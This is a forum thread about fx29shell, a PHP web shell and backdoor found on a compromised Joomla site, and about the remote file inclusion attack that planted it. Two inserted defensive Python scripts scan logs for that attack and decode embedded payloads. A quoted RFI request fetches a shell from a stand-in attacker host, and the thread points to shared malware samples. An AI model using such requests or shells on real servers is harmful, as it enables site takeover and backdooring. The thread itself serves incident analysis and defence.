PHP Malware
Darkelf
April 15th, 2010, 11:07
Hi there,
today I found an interesting file on a client's website.
The original was renamed to ~ and the malicious one tried to send email all day. Fortunately (for the client) the email address was not valid. I guess the site was compromised via an outdated Joomla installation.
The evil .php file also tried to backdoor the host. There are two backdoor routines - one in Perl and one in C (Base64 encoded ELF file). Due to the invalid email there was no further damage. At least I didn't find any other Easter egg so far. I attach the file here.
Right now I'm waiting for midnight because this is the time when the logs are provided for today (infection was right after midnight), so I might find out how the infection was done.
It's fx29shell by Fatalz or FaTaLisTiCz.
darkelf
edit: I just found out that the server was infected using RFI (Remote File Inclusion).
This is the first time I hear about this technique and I find it pretty scary because of its simplicity.
MALWARE
Password: malware
Kayaker
April 15th, 2010, 16:33
Hi
Thanks for the change of pace. I haven't looked at it closely yet but from the multitude of google hits it looks somewhat similar to the c99.php shell.
C99 is something I found out about from the book Detecting Malice by RSnake, http://ha.ckers.org/
If you're not familiar with it I recommend finding a copy of the book and browsing around that site (whitehat).
Quote:
Remote File Inclusion
Another interesting thing about a lot of requesting URLs that you will see in your logs, especially if you are running an open source PHP application, is a large chunk of PHP remote file inclusion (RFI) attacks. These attacks are attempting to pull in remote files and execute them on your website. They do this as a way of adding more servers to their networks of compromised machines (or botnets), as well as to gain access to potentially sensitive information on your website. Here’s what one such attack might look like:
GET /?a=http://bad-guy.com/c99.php HTTP/1.0
There is one thing about this URL that stands out beyond the fact that it’s pulling a c99 shell (which is a well known PHP backdoor), and that is the fact that it’s pulling in a remote file at all. This is a bit of anomaly detection because it’s probably not a URL that anyone has ever gone to on your site before. However, it’s also especially likely to be an attack if you don’t have any form of website redirection or any part of your site that allows 3rd party URLs to be inputted as part of the URL structure of your site.
Note: There is a significant trend towards not doing a first attack with a c99 shell, instead using a small script that just outputs a pre-defined number. If the attacker sees the number in output they will know the attack worked. Every c99 shell invocation usually includes the username and password (specific to the attacker), which in turn gives not only access but control over your machine. They typically control your compromised computer through IRC channels as well as many other previously compromised systems.
I'll try running it later on my WAMP setup and see what happens. Please post any further info if anyone digs into it deeper.
Regards,
Kayaker
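The book excerpt above describes the one thing that stands out in an RFI request: a parameter whose value is itself a URL. The following added example (not code from the thread or from the book) runs that check over a few constructed combined-format access log lines. It decodes percent-encoded parameter values, so an encoded `http%3A%2F%2F...` is caught as well as the plain form, and it separately flags POSTs to script files because the request body is not in the access log and cannot be inspected there. The IP addresses, hostnames and paths in the sample are constructed.

```python
"""Flag possible remote-file-inclusion (RFI) requests in combined-format web access logs.

Added example; the log lines in SAMPLE_LOG are constructed, not taken from the thread.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format:
#   ip ident user [time] "METHOD target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself a URL is the RFI tell: the script is being asked
# to include() a file fetched from somewhere else.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample: one normal CMS request, two RFI attempts (one percent-encoded,
# one plain), one POST to a script dropped in an image directory, one static file.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Apr/2010:00:03:11 +0200] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Apr/2010:00:03:14 +0200] "GET /?a=http://bad-guy.example/c99.php HTTP/1.0" 200 812 "-" "libwww-perl/5.805"
203.0.113.7 - - [15/Apr/2010:00:03:15 +0200] "GET /modules/mod_x/helper.php?path=http%3A%2F%2Fbad-guy.example%2Fid.txt%3F HTTP/1.0" 200 3 "-" "libwww-perl/5.805"
203.0.113.7 - - [15/Apr/2010:00:03:20 +0200] "POST /images/stories/x.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Apr/2010:00:04:01 +0200] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def remote_params(target):
    """Return (name, value) pairs from the query string whose decoded value is a remote URL.

    parse_qsl undoes percent-encoding, so an attacker encoding the scheme does not hide it.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return one finding dict per suspicious request, in log order.

    'remote-url-parameter' is the RFI signature itself. 'post-to-script' is a weaker
    signal: the body of a POST never reaches the access log, so a POST to a .php file
    is only flagged for manual review of where that file lives and when it appeared.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        base = {"ip": m["ip"], "time": m["time"], "method": m["method"],
                "target": m["target"], "status": m["status"]}
        hits = remote_params(m["target"])
        if hits:
            findings.append({**base, "reason": "remote-url-parameter", "params": hits})
        elif m["method"] == "POST" and urlsplit(m["target"]).path.endswith(".php"):
            findings.append({**base, "reason": "post-to-script", "params": []})
    return findings


def suspects_by_ip(findings):
    """Count findings per client address, to spot a chain of calls from one source."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['time']} {f['ip']} {f['method']} {f['target']}  [{f['reason']}] {f['params']}")
    print("by ip:", dict(suspects_by_ip(found)))
```

Run it against a real log with `scan_log(open("access.log").readlines())`; the "post-to-script" hits are the ones to cross-check against file modification times in the web root, since the log alone cannot tell what the POST carried.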
Woodmann
April 15th, 2010, 19:04
Howdy,
I see this shit almost daily. I just checked another one a few minutes ago.
Another server I maintain unrelated to this place was infected with same type of exploit. The funny thing was they put the scripts in the image folder.
They didn't use anything intelligent when naming the file so it was pretty obvious when I saw it was being called in the log files.
I hardened PHP to stop it.
Beware when hardening PHP, there seems to be a fine line between not enough and too much.
Woodmann
Darkelf
April 15th, 2010, 19:42
Hi guys,
I guess the reason why I didn't come across this yet is my client's site being really unimportant. He is running a small real-estate company. I think it was a script-kiddie making some automated scan and exploit. What nags me is that I'm unable to find anything suspicious in the logs. At the time the infection happened, I see only a chain of calls from a proxy (Brazil-based), but none of the calls looks unusual. Nothing like the call Kayaker posted - nothing that points away from the server. So I'm still clueless how this guy managed to come in. Well, I'm fairly sure it was this RFI thingy and that's quite an itch where I can't scratch. If I find something, I will let you know and if someone wants to see the log, please tell me (I will only remove the sitename).
@kayaker
Thank you very much for the link. I will try to get a copy of this book. It looks like an interesting read.
Best regards
darkelf
dELTA
April 15th, 2010, 20:23
If the hackers gained control of the server, they may very well have cleaned out the sensitive parts of the log files before you got to them.
Also, if the payload was injected by means of a POST request, you won't necessarily see anything special in the web logs to begin with.
Woodmann
April 15th, 2010, 20:31
Quote:
you won't necessarily see anything special in the web logs to begin with
I suppose it depends on your level of logging.
I don't think they are that technical to remove log entries.
Woodmann
Darkelf
April 15th, 2010, 20:36
Hi dELTA,
the server in question is a shared host where the logfile of a day is provided when the day is over. Usually a few minutes after midnight. I noticed the infection the same day it happened, so they were not able to clean the logs. The other logs were also untouched. I'm sure that the calls from Brazil are the ones in charge. Among these, there is also a single POST request (the ONLY one in the whole logfile). I'm not very skilled when it comes to webhacking, but I'm trying to dig a bit deeper, now that I'm affected.
Best regards
darkelf
Kayaker
April 16th, 2010, 00:50
That's actually very cool. I was going to attach a snapshot of what it looks like on my Windows system but it doesn't come out very well. If interested google for 'Fx29Sh' and look for a black GUI/green text showing a victim's directory listing.
Actually, here's an example image
http://www.martinsecurity.net/2009/05/17/17400-sites-affected-by-fx29-rfi-pt2/
and another version of the script (sans backdoor)
http://pastebin.com/xLCG0dpG
I extracted the base64 encoded 'backdoor' functions and have attached them for interest. 'Backc' and 'Shdb' are ELF files, 'Back' is a Perl script. The small php script I used to decode them, basically ripped from the main file, is included. Even the icon images are base64 encoded and rendered inline.
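Kayaker's post describes pulling the base64-encoded blobs out of the shell and finding two ELF files, a Perl script and inline icon images. The following added example (not Kayaker's decoding script and not from the sample) does that extraction generically: it finds long base64 runs in PHP source, decodes them without executing anything, and classifies each by its leading magic bytes. The PHP source it scans is constructed in the script itself from harmless stand-in payloads, so it runs offline; the variable names `$back` and `$backc` mirror the attachment names mentioned above but the contents are invented.

```python
"""Pull base64-encoded blobs out of PHP source and identify them by magic bytes.

Added example; SAMPLE_PHP is constructed here from harmless stand-in payloads.
Nothing decoded is ever executed, only inspected and hashed.
"""
import base64
import binascii
import hashlib
import re

# Constructed stand-ins for the kinds of blobs the thread describes: an ELF header with
# no code behind it, a Perl script that only prints, and a minimal GIF header.
FAKE_ELF = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"constructed, not executable"
FAKE_PERL = b'#!/usr/bin/perl\nprint "constructed sample, does nothing\\n";\n'
FAKE_GIF = b"GIF89a\x01\x00\x01\x00" + b"\x00" * 14

# Constructed PHP source in the shape of a shell that carries its payloads inline.
SAMPLE_PHP = (
    "<?php\n"
    f'$back  = "{base64.b64encode(FAKE_PERL).decode()}";\n'
    f'$backc = "{base64.b64encode(FAKE_ELF).decode()}";\n'
    f'echo \'<img src="data:image/gif;base64,{base64.b64encode(FAKE_GIF).decode()}">\';\n'
    '$short = "aGk="; // below the length threshold, ignored\n'
)

# Runs of base64 alphabet characters with optional padding; short runs are noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Leading bytes that identify common embedded file types.
MAGIC = [
    (b"\x7fELF", "ELF executable"),
    (b"MZ", "PE executable"),
    (b"#!", "script with shebang"),
    (b"<?php", "PHP source"),
    (b"GIF8", "GIF image"),
    (b"\x89PNG", "PNG image"),
    (b"\xff\xd8\xff", "JPEG image"),
]


def classify(data):
    """Name the file type of a decoded blob from its first bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extract_blobs(src, min_len=24):
    """Return a dict per decodable base64 run in src, in source order.

    Each dict carries the offset in the source, the encoded length, the decoded bytes,
    their SHA-256 (for lookup or for labelling extracted files) and the classified kind.
    """
    blobs = []
    for m in B64_RE.finditer(src):
        token = m.group(0)
        if len(token) < min_len or len(token) % 4:
            continue  # not a complete base64 string
        try:
            data = base64.b64decode(token, validate=True)
        except binascii.Error:
            continue  # looked like base64 but was not (bad padding etc.)
        blobs.append({
            "offset": m.start(),
            "encoded_len": len(token),
            "kind": classify(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "data": data,
        })
    return blobs


if __name__ == "__main__":
    for i, b in enumerate(extract_blobs(SAMPLE_PHP)):
        print(f"blob {i}: offset={b['offset']} len={len(b['data'])} kind={b['kind']} sha256={b['sha256'][:16]}...")
```

On a real sample, feed it `extract_blobs(open("shell.php", encoding="latin-1").read())` and write each `data` to a file named after its hash for further static analysis; the "unknown" hits are worth a second look too, since a payload may be wrapped in a second layer of encoding or compression.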
Silkut
April 16th, 2010, 02:30
I was doing the same as Kayaker yesterday,
as for logs, no big surprise that it doesn't show anything interesting, look at that.
It is not only looking/acting like c99 shell but also r57 and w4ck1ng shells.
Powered by vBulletin® Version 4.2.2 Copyright © 2018 vBulletin Solutions, Inc. All rights reserved.